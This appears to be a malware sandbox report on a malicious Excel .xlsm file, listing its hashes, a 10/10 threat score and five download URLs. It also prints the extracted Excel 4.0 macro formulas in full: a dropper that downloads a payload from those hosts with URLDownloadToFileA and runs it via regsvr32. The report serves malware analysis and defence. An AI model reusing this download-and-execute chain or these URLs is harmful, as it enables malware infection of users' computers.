Overview

overview

10

Static

static

10

8785f8a971...7.xlsm

windows7-x64

10

8785f8a971...7.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    8785f8a97162333ca6c2daff37af851ba813c1f5e93550a9702c23dfe1a0ae17

  • Size

    90KB

  • Sample

    241120-wwjxha1fnl

  • MD5

    79bca6a455b1291a4a4ab52e9e3599de

  • SHA1

    ee0891d5a6786f735c219ebf66f414c6fe7a226c

  • SHA256

    8785f8a97162333ca6c2daff37af851ba813c1f5e93550a9702c23dfe1a0ae17

  • SHA512

    7722cb0c1a1402ae827eb91606d697c8dbcc42cdafd4d6c44a3a679ba633d830c7bff2f3a0fb256f02948c8f8f50557c17eeab04fb0c2a3feef62fae560e3691

  • SSDEEP

    1536:vQBrnXpnyV+ns1BVi/IEh2hx0Lx3bKhllGGx0vKCEjdQjqEk+xXPd:GDpyVEoBo6hKb4llGsQjbxfd

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://www.ajaxmatters.com/c7g8t/zbBYgukXYxzAF2hZc/

http://www.beholdpublications.com/home/BABxyyWZx8Vu/

http://explorationit.com/screwing/AxLm/

http://donboscoschoolputhuppally.org/wp-content/UuQ7LBsPoGu9Q/

http://myclassroomtime.com/mongery/ZlPsROtQiXIujmJmAA/
Attributes
  • formulas

    =FORMULA() =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.ajaxmatters.com/c7g8t/zbBYgukXYxzAF2hZc/","..\xxw1.ocx",0,0) =IF('EGFAGAGDGE'!D15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.beholdpublications.com/home/BABxyyWZx8Vu/","..\xxw1.ocx",0,0)) =IF('EGFAGAGDGE'!D17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://explorationit.com/screwing/AxLm/","..\xxw1.ocx",0,0)) =IF('EGFAGAGDGE'!D19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://donboscoschoolputhuppally.org/wp-content/UuQ7LBsPoGu9Q/","..\xxw1.ocx",0,0)) =IF('EGFAGAGDGE'!D21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://myclassroomtime.com/mongery/ZlPsROtQiXIujmJmAA/","..\xxw1.ocx",0,0)) =IF('EGFAGAGDGE'!D23<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\xxw1.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://www.ajaxmatters.com/c7g8t/zbBYgukXYxzAF2hZc/

Targets

    • Target

      8785f8a97162333ca6c2daff37af851ba813c1f5e93550a9702c23dfe1a0ae17

    • Size

      90KB

    • MD5

      79bca6a455b1291a4a4ab52e9e3599de

    • SHA1

      ee0891d5a6786f735c219ebf66f414c6fe7a226c

    • SHA256

      8785f8a97162333ca6c2daff37af851ba813c1f5e93550a9702c23dfe1a0ae17

    • SHA512

      7722cb0c1a1402ae827eb91606d697c8dbcc42cdafd4d6c44a3a679ba633d830c7bff2f3a0fb256f02948c8f8f50557c17eeab04fb0c2a3feef62fae560e3691

    • SSDEEP

      1536:vQBrnXpnyV+ns1BVi/IEh2hx0Lx3bKhllGGx0vKCEjdQjqEk+xXPd:GDpyVEoBo6hKb4llGsQjbxfd

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks